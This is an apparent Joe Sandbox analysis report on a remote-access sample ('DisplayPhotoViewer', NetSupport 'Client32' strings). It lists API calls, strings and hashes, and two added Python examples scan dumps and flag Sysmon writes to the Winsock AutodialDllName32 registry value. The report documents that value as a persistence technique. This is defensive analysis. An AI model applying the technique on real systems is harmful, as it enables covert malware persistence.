                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf
                                                                                                    • String ID: ..\CTL32\configplus.cpp$result <= buflen
                                                                                                    • API String ID: 2111968516-413741496
                                                                                                    • Opcode ID: 82a7b8ce8581fba54c8347dbdac76557fe6edf73b07710abf64bb0ea1c60cc2d
                                                                                                    • Instruction ID: d434dea95b173de1dda137e4ed9d70a2ca523af289c8d3ef3649eef93b958720
                                                                                                    • Opcode Fuzzy Hash: 82a7b8ce8581fba54c8347dbdac76557fe6edf73b07710abf64bb0ea1c60cc2d
                                                                                                    • Instruction Fuzzy Hash: 55212C35A001466BC781CE289C94DEEBBE59BC2328B14C392FD6947290DF31F9058791
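The report ties several source-file and assertion strings (for example "..\CTL32\configplus.cpp", "result <= buflen", "AutodialDllName32") to the module the sandbox carved at image base 11000000. The following is an added example, not part of the Joe Sandbox report or of the sample, showing how an analyst can re-find those strings in a raw memory dump and turn the hits into virtual addresses for cross-reference with the function listings. The dump bytes are constructed for the example; a real run would read the .sdmp files the report links. The two-strings-minimum threshold in `triage_verdict` is an assumption chosen for the example, not a rule from the report.

```python
"""Added example: locate report-listed strings in a memory dump and map
file offsets back to virtual addresses (image base + offset).
Not part of the Joe Sandbox report; sample bytes below are constructed."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Strings taken from the report's "String ID" fields. Both ASCII and
# UTF-16LE forms are searched, since the same build often carries wide copies.
REPORT_STRINGS = [
    "..\\CTL32\\configplus.cpp",
    "result <= buflen",
    "AutodialDllName32",
    "System\\CurrentControlSet\\Services\\Winsock\\Autodial",
    "SAMS Teach",
]


@dataclass(frozen=True)
class Hit:
    needle: str
    encoding: str  # "ascii" or "utf-16le"
    offset: int    # byte offset inside the dump
    va: int        # virtual address = image base + offset


def build_patterns(needles):
    """Compile one bytes regex per (string, encoding) pair."""
    pats = {}
    for s in needles:
        pats[(s, "ascii")] = re.compile(re.escape(s.encode("ascii")))
        pats[(s, "utf-16le")] = re.compile(re.escape(s.encode("utf-16le")))
    return pats


def scan_dump(dump: bytes, image_base: int, needles=REPORT_STRINGS) -> list[Hit]:
    """Return every occurrence of the needles, ordered by offset."""
    hits = []
    for (s, enc), pat in build_patterns(needles).items():
        for m in pat.finditer(dump):
            hits.append(Hit(s, enc, m.start(), image_base + m.start()))
    return sorted(hits, key=lambda h: h.offset)


def triage_verdict(hits, min_distinct=2):
    """Require several distinct strings before calling the dump a match:
    a lone 'SAMS Teach' or 'result <= buflen' is too generic on its own.
    (min_distinct=2 is an assumption for this example.)"""
    distinct = {h.needle for h in hits}
    return len(distinct) >= min_distinct, sorted(distinct)


# Constructed dump: filler bytes with a few of the report's strings embedded,
# one of them in UTF-16LE to show the wide-string path.
SAMPLE_DUMP = (
    b"\x00" * 0x40
    + b"..\\CTL32\\configplus.cpp\x00"
    + b"\x90" * 0x20
    + "AutodialDllName32".encode("utf-16le") + b"\x00\x00"
    + b"\xcc" * 0x10
    + b"result <= buflen\x00"
)

if __name__ == "__main__":
    found = scan_dump(SAMPLE_DUMP, image_base=0x11000000)
    for h in found:
        print(f"{h.va:#010x} {h.encoding:9} {h.needle}")
    ok, names = triage_verdict(found)
    print("match" if ok else "no match", names)
```

The virtual addresses printed can be compared directly with the `ref:` addresses in the function listings, which are given relative to the same 11000000 base.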
                                                                                                    APIs
                                                                                                    • GetVersionExA.KERNEL32(?), ref: 1105F96E
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Services\Winsock\Autodial,00000000,00000000,00000000), ref: 1105F996
                                                                                                    • RegSetValueExA.ADVAPI32(00000000,AutodialDllName32,00000000,?,111E12E1,00000010), ref: 1105FA80
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 1105FA8D
                                                                                                      • Part of subcall function 11139370: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110784B,75BF8400,?,?,1113B43F,00000000,CSDVersion,00000000,00000000,?), ref: 11139390
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Value$CloseOpenQueryVersion
                                                                                                    • String ID: AutodialDllName32$System\CurrentControlSet\Services\Winsock\Autodial
                                                                                                    • API String ID: 387276457-2283657482
                                                                                                    • Opcode ID: e22624d642e8d921c2b811a0cc19726f269b9388cb6052047739566162a0b115
                                                                                                    • Instruction ID: 3776714795edbc3776d638561de404754c5d0d2a9cc6283694a001484c378f97
                                                                                                    • Opcode Fuzzy Hash: e22624d642e8d921c2b811a0cc19726f269b9388cb6052047739566162a0b115
                                                                                                    • Instruction Fuzzy Hash: 1E3192B0E1021A9FEB51CBA0CC84FEDF7B9AB49348F5040E8F90DA6281D7746D85CB56
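The function above opens HKLM\System\CurrentControlSet\Services\Winsock\Autodial and writes the AutodialDllName32 value, which names the DLL Winsock loads for autodial; a non-stock DLL there survives reboots and is loaded into networking processes. Below is an added detection example, not from the Joe Sandbox report, that flags value-set events on that path. It consumes a simplified key=value rendering of Sysmon Event ID 13 (RegistryEvent, Value Set) fields rather than raw Sysmon XML; the log lines, process paths and DLL names are constructed placeholders, and the baseline DLL name `rasadhlp.dll` is an assumption to check against a clean host before relying on it.

```python
"""Added example: flag writes to the Winsock Autodial DLL value that the
report shows this sample setting through RegOpenKeyExA/RegSetValueExA.
Not part of the Joe Sandbox report; log lines below are constructed."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Value written by the sample, as listed in the report (hive stripped, lowercase).
AUTODIAL_VALUE = r"system\currentcontrolset\services\winsock\autodial\autodialdllname32"

# Stock autodial helper on a clean install. Assumption for this example:
# confirm against your own baseline. Any other DLL written here is high severity.
BASELINE_DLLS = {"rasadhlp.dll"}


@dataclass
class Finding:
    image: str
    target: str
    details: str
    severity: str


_FIELD = re.compile(r"(\w+)=([^|]*)")


def parse_event(line: str) -> dict:
    """Parse 'Key=Value|Key=Value' fields; keys follow Sysmon's field names."""
    return {k: v.strip() for k, v in _FIELD.findall(line)}


def _normalise_target(target: str) -> str:
    """Lowercase and strip the hive prefix so paths compare consistently."""
    t = target.lower().replace("/", "\\")
    for hive in ("hklm\\", "hkey_local_machine\\"):
        if t.startswith(hive):
            t = t[len(hive):]
    return t


def detect_autodial_write(ev: dict) -> Finding | None:
    """Return a Finding when a Value Set event targets AutodialDllName32."""
    if ev.get("EventID") != "13":
        return None
    target = _normalise_target(ev.get("TargetObject", ""))
    if not target.endswith(AUTODIAL_VALUE):
        return None
    details = ev.get("Details", "")
    dll = details.split("\\")[-1].lower()
    severity = "medium" if dll in BASELINE_DLLS else "high"
    return Finding(ev.get("Image", "?"), ev["TargetObject"], details, severity)


def scan_log(lines):
    return [f for f in (detect_autodial_write(parse_event(l)) for l in lines) if f]


# Constructed log lines (placeholder paths, not telemetry from the report).
SAMPLE_LOG = [
    "EventID=13|Image=C:\\Users\\user\\AppData\\Roaming\\example\\viewer.exe|"
    "TargetObject=HKLM\\System\\CurrentControlSet\\Services\\Winsock\\Autodial\\AutodialDllName32|"
    "Details=C:\\Users\\user\\AppData\\Roaming\\example\\hook.dll",
    "EventID=13|Image=C:\\Windows\\explorer.exe|"
    "TargetObject=HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Example|"
    "Details=C:\\example\\app.exe",
    "EventID=13|Image=C:\\Windows\\System32\\svchost.exe|"
    "TargetObject=HKLM\\System\\CurrentControlSet\\Services\\Winsock\\Autodial\\AutodialDllName32|"
    "Details=rasadhlp.dll",
    "EventID=12|Image=C:\\Windows\\System32\\svchost.exe|"
    "TargetObject=HKLM\\System\\CurrentControlSet\\Services\\Winsock\\Autodial",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"[{f.severity}] {f.image} wrote {f.details!r} to {f.target}")
```

Matching on the suffix of the normalised path keeps the rule robust to how the hive is rendered (HKLM vs HKEY_LOCAL_MACHINE); the severity split lets a stock value written by a system process be triaged rather than paged.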
                                                                                                    APIs
                                                                                                    • EnterCriticalSection.KERNEL32(?,218EC38C,75A92AF0,00000001,000000C8,11055AA5,?,?,00000000,?,?), ref: 11055628
                                                                                                    • timeGetTime.WINMM ref: 1105565B
                                                                                                      • Part of subcall function 11138650: _strncpy.LIBCMT ref: 11138692
                                                                                                    • SetEvent.KERNEL32(?), ref: 110556A4
                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 110556AB
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                      • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSectionwsprintf$EnterErrorEventExitLastLeaveMessageProcessTime_malloc_memset_strncpytime
                                                                                                    • String ID: CltReconn.cpp$gMain.pReconnThread
                                                                                                    • API String ID: 3397837340-2390197369
                                                                                                    • Opcode ID: 34f201c7e8294dcd1ed569f3db5d0321b2a899ec542b597797a217de09b3d411
                                                                                                    • Instruction ID: e60ddbd284271ff3c54df429e580a7f336de7e7426624e9493bec2987c04d5b4
                                                                                                    • Opcode Fuzzy Hash: 34f201c7e8294dcd1ed569f3db5d0321b2a899ec542b597797a217de09b3d411
                                                                                                    • Instruction Fuzzy Hash: 1231BCB2D01615DFCB50CFA8E880B9EBBF4FB48714F01856AE815E7344D771A900CBA1
                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(0000004C), ref: 110B31D2
                                                                                                    • GetSystemMetrics.USER32(0000004D), ref: 110B31D9
                                                                                                    • GetSystemMetrics.USER32(0000004E), ref: 110B31E0
                                                                                                    • GetSystemMetrics.USER32(0000004F), ref: 110B31E7
                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B31F6
                                                                                                    • GetSystemMetrics.USER32(?), ref: 110B3204
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 110B3213
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: System$Metrics$InfoParameters
                                                                                                    • String ID:
                                                                                                    • API String ID: 3136151823-0
                                                                                                    • Opcode ID: d07a2bd3bdd7468483f94f714aba912f2e3b4f3983168ae5408b4c5ce31560e1
                                                                                                    • Instruction ID: 3f07df0d522763fe5102794122014a385b33cf1c391a97fc767f73123e36ccd0
                                                                                                    • Opcode Fuzzy Hash: d07a2bd3bdd7468483f94f714aba912f2e3b4f3983168ae5408b4c5ce31560e1
                                                                                                    • Instruction Fuzzy Hash: 4D310875E0030A9FDB14DFA9C881A9EFBF1AF88710F20842EE955A7340DA74A941CF58
                                                                                                    APIs
                                                                                                      • Part of subcall function 110CA450: wvsprintfA.USER32(?,?,1103CDC6), ref: 110CA482
                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 110095D6
                                                                                                    • WriteFile.KERNEL32(?,<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >,000000B9,00000000,00000000), ref: 110095EB
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    • IsA(), xrefs: 1100958D, 110095B5
                                                                                                    • <tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >, xrefs: 110095E5
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 11009588, 110095B0
                                                                                                    • <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">, xrefs: 11009559
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite$ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                    • String ID: <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">$<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >$IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h
                                                                                                    • API String ID: 863766397-2085542942
                                                                                                    • Opcode ID: 51c40d69a26ed4bfba167a4c7e60b1b7c73a66a33188c21e77654478c20279db
                                                                                                    • Instruction ID: 599b03551c42d5d032f790a55b3f9c2c9a245fbf6a119485c46fe5824df50334
                                                                                                    • Opcode Fuzzy Hash: 51c40d69a26ed4bfba167a4c7e60b1b7c73a66a33188c21e77654478c20279db
                                                                                                    • Instruction Fuzzy Hash: DB214C79A0061AABDB00DB95DC41FDEF3B9FF98614F004259E925B3280EB746A04CFA1
                                                                                                    APIs
                                                                                                    • GetWindowPlacement.USER32(?,0000002C,?,75BF7AA0,00000000), ref: 1105F13D
                                                                                                    • wsprintfA.USER32 ref: 1105F179
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf$ErrorExitLastMessagePlacementProcessWindow
                                                                                                    • String ID: %d %d %d %d %d %d %d %d %d$,$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 1558849722-4034562342
                                                                                                    • Opcode ID: 2874f0fa1e080f679f5563b85c9d265ed8ec63c80b9ea10bea1b645286976c99
                                                                                                    • Instruction ID: 1bf87f6305d01663ca76318fac5e88f2ef7aa50553b54e5b6486dc758f7d0ba4
                                                                                                    • Opcode Fuzzy Hash: 2874f0fa1e080f679f5563b85c9d265ed8ec63c80b9ea10bea1b645286976c99
                                                                                                    • Instruction Fuzzy Hash: C82129B5A11119ABCB44CF99DC85EAFF7B9AF88304F144159F919A3240D670A9018BA1
                                                                                                    APIs
                                                                                                    • _memset.LIBCMT ref: 110F1325
                                                                                                    • GetACP.KERNEL32(0BA6C1B8,DBCS,Charset,932=*128,?,?,00000000), ref: 110F138E
                                                                                                      • Part of subcall function 1105FE80: _strtok.LIBCMT ref: 1105FEC0
                                                                                                      • Part of subcall function 1105FE80: _strtok.LIBCMT ref: 1105FEF0
                                                                                                    Strings
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _strtok$_memset
                                                                                                    • String ID: 932=*128$Charset$DBCS$g
                                                                                                    • API String ID: 80812033-995648831
                                                                                                    • Opcode ID: c4e83b88a9d21f5a13e7bb1f523e8e999fcf8c9f3297d05952e5d1d0ff86c61f
                                                                                                    • Instruction ID: 0a96bfca87417c8ada69953f347151fbde549fbc0bab3e4aeca4c5d3103d50cc
                                                                                                    • Opcode Fuzzy Hash: c4e83b88a9d21f5a13e7bb1f523e8e999fcf8c9f3297d05952e5d1d0ff86c61f
                                                                                                    • Instruction Fuzzy Hash: 782149B5A006589FCBA4CF59DC84BDAF7F4EF88304F1041A9E919A7340DB31AA84CF91
                                                                                                    APIs
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 110055DD
                                                                                                    • BeginPaint.USER32(?,?), ref: 110055E8
                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00CC0020), ref: 1100560A
                                                                                                    • EndPaint.USER32(?,?), ref: 1100562F
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    • m_hWnd, xrefs: 110055C8
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110055C3
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Paint$BeginClientErrorExitLastMessageProcessRectwsprintf
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 1216912278-1557312927
                                                                                                    • Opcode ID: 59c5a246da2c833e37ef27e65802a8e01080c7fc149451a822050f1e40406b83
                                                                                                    • Instruction ID: c8a66ae0772491c75878a24b4f33e8f636d1fcb70075d762936dc97e44d483e8
                                                                                                    • Opcode Fuzzy Hash: 59c5a246da2c833e37ef27e65802a8e01080c7fc149451a822050f1e40406b83
                                                                                                    • Instruction Fuzzy Hash: 63118275A00219BFD710CBA0DC85FAEF3BDEB88704F108029F90696180EA70B9058B65
APIs
• InterlockedDecrement.KERNEL32(?), ref: 1100B200
• EnterCriticalSection.KERNEL32(?,?,1100BE4B,?,00000000,00000002), ref: 1100B239
• EnterCriticalSection.KERNEL32(?,?,1100BE4B,?,00000000,00000002), ref: 1100B258
  • Part of subcall function 1100A150: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A16E
  • Part of subcall function 1100A150: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A198
  • Part of subcall function 1100A150: GetLastError.KERNEL32 ref: 1100A1A0
  • Part of subcall function 1100A150: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A1B4
  • Part of subcall function 1100A150: CloseHandle.KERNEL32(00000000), ref: 1100A1BB
• waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BE4B,?,00000000,00000002), ref: 1100B268
• LeaveCriticalSection.KERNEL32(?,?,1100BE4B,?,00000000,00000002), ref: 1100B26F
• _free.LIBCMT ref: 1100B278
• _free.LIBCMT ref: 1100B27E
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
• String ID:
• API String ID: 705253285-0
APIs
• LoadMenuA.USER32(00000000,00002EF1), ref: 110033BD
• GetSubMenu.USER32(00000000,00000000), ref: 110033E3
• DestroyMenu.USER32(00000000), ref: 11003412
  • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
  • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
  • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
  • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
• String ID: ..\CTL32\annotate.cpp$hMenu$hSub
• API String ID: 468487828-934300333
APIs
• LoadMenuA.USER32(00000000,00002EFD), ref: 110032CD
• GetSubMenu.USER32(00000000,00000000), ref: 110032F3
• DestroyMenu.USER32(00000000), ref: 11003322
  • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
  • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
  • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
  • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
• String ID: ..\CTL32\annotate.cpp$hMenu$hSub
• API String ID: 468487828-934300333
APIs
• GetMenu.USER32(?), ref: 110B3434
• GetSubMenu.USER32(00000000,00000002), ref: 110B343D
• GetMenuItemCount.USER32(00000000), ref: 110B3446
• DeleteMenu.USER32(00000000,00000000,00000400,00000000,00000000,?,?,?,110B8052,75BF7C34,?), ref: 110B3468
  • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
  • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
  • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
  • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
Strings
• m_hWnd, xrefs: 110B3423
• e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110B341E
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: Menu$CountDeleteErrorExitItemLastMessageProcesswsprintf
• String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
• API String ID: 2484136202-1557312927
APIs
Strings
• *TwoChannelConnect, xrefs: 10702F91
• hCapiInst, xrefs: 10702F74
• CapiDial called, number=%s, TwoChannelConnect=%d, xrefs: 10702FA0
• CapiDial complete, connect_result [0]=%x, connect_result [1]=%x, xrefs: 107031EA
• E:\nsmsrc\nsm\1201\1201\ctl32\PCICAPI.C, xrefs: 10702F6F
Memory Dump Source
• Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
• Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
Similarity
• API ID: Sleep
• String ID: *TwoChannelConnect$CapiDial called, number=%s, TwoChannelConnect=%d$CapiDial complete, connect_result [0]=%x, connect_result [1]=%x$E:\nsmsrc\nsm\1201\1201\ctl32\PCICAPI.C$hCapiInst
• API String ID: 3472027048-1297792176
APIs
• GetStringTypeW.KERNEL32(00000001,10710274,00000001,1070AA72,?,00000100,00000000,1070AA72,00000001,?,00000100,?,00000000,00000000), ref: 1070DA9D
• GetStringTypeA.KERNEL32(00000000,00000001,10710270,00000001,?), ref: 1070DAB7
• GetStringTypeW.KERNEL32(00000000,?,00000100,?,?,00000100,00000000,1070AA72,00000001,?,00000100,?,00000000,00000000), ref: 1070DADE
• WideCharToMultiByte.KERNEL32(00000001,00000220,?,00000100,00000000,00000000,00000000,00000000,?,00000100,00000000,1070AA72,00000001,?,00000100,?), ref: 1070DB11
• WideCharToMultiByte.KERNEL32(?,00000220,?,?,00000000,00000000,00000000,00000000), ref: 1070DB7A
